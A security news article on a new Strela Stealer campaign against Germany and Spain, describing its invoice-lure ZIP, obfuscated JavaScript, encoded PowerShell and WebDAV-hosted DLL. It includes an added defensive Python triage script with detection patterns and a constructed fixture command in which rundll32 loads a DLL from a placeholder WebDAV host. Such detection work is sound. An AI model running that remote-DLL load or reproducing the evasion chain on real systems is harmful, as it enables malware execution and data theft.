New Variation of Strela Stealer Uncovered by CRIL Researchers
Cyble Research and Intelligence Labs (CRIL) researchers have uncovered a new variation of the Strela Stealer. According to a recent Cyble blog post, the new variant represents a notable advancement in malware delivery techniques, with increased sophistication and stealth.
The latest campaign targeting Germany and Spain features versions in German, Spanish, and Basque, but experts warn that this malware could easily be repurposed for attacks in other regions, similar to what happened with the initial version of the infostealer.
The new Strela Stealer variant uses obfuscated JavaScript and base64-encoded PowerShell commands, which Cyble says make it extremely difficult to detect and respond to. The malware also executes the DLL file directly from a WebDAV server without saving it to disk, further helping it evade security measures.
This malicious software is designed to steal email configuration details and gather detailed system information, allowing attackers to conduct reconnaissance and potentially launch further targeted actions on compromised systems, Cyble explained.
The new campaign begins with a fake invoice notification and a ZIP file attachment containing obfuscated JavaScript code. This code runs through WScript, launching a base64-encoded PowerShell command that executes the final malicious DLL from a WebDAV server using “rundll32.exe” via the export function “Entry.”
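Defender-side triage for the chain described above (WScript-launched JavaScript spawning base64-encoded PowerShell, then rundll32.exe loading the DLL from a WebDAV path and calling its export) as an added example, not code from Cyble or from the original post; it runs over constructed Sysmon-style process-creation events, and the host name, share and DLL name are placeholders.

```python
import base64
import re
# Constructed Sysmon-style process-creation events (not real telemetry): the host is a placeholder and
# the encoded blob is built from a harmless command so the decoder can be checked end to end.
SAMPLE_ENCODED = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Date"'},  # benign
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"},  # JScript stage launching PowerShell
    {"ParentImage": PS, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\webdav.example.invalid@SSL\DavWWWRoot\share\payload.dll,Entry"},  # WebDAV DLL
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign local DLL
]
# -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob, which PowerShell decodes as UTF-16LE.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# UNC/WebDAV (\\host@SSL\DavWWWRoot\...) or URL DLL paths: the module is never written to local disk.
REMOTE_PATH = re.compile(r"(?i)^(?:\\\\|//|https?://)|davwwwroot")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (AttributeError, ValueError, UnicodeDecodeError):  # no match, bad base64, or bad UTF-16
        return None

def parse_rundll32(cmdline):
    """Split 'rundll32.exe <dll>,<export>' into (dll, export); None if not a rundll32 command line."""
    m = re.match(r'(?i)\s*"?(?:[^\s"]*\\)?rundll32(?:\.exe)?"?\s+(.+)$', cmdline)
    if not m:
        return None
    parts = re.split(r"[,\s]+", m.group(1).strip().strip('"'), maxsplit=1)
    return parts[0], (parts[1] if len(parts) > 1 else "")

def classify(event):
    """Return the chain stages this event matches (empty list for events that look benign)."""
    findings, image, parent = [], event["Image"].lower(), event["ParentImage"].lower()
    if image.endswith("powershell.exe") and parent.endswith("wscript.exe"):
        if decode_encoded_command(event["CommandLine"]) is not None:
            findings.append("wscript_spawns_encoded_powershell")
    parsed = parse_rundll32(event["CommandLine"]) if image.endswith("rundll32.exe") else None
    if parsed and REMOTE_PATH.search(parsed[0]):
        findings.append("rundll32_loads_remote_dll:" + (parsed[1] or "<no export>"))
    return findings

def triage(events):  # index -> findings, keeping only events that matched at least one chain stage
    return {i: f for i, e in enumerate(events) if (f := classify(e))}
```

Decoding the encoded argument lets an analyst see the actual PowerShell rather than alerting on the base64 blob alone, and the rundll32 check keys on the remote path, so it fires regardless of which export name a later campaign uses.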
These techniques let the Strela Stealer evade security products and carry out its activities undetected. The full Cyble blog post includes additional details, MITRE ATT&CK techniques, and around 100 Indicators of Compromise (IoCs) for cybersecurity professionals to be aware of.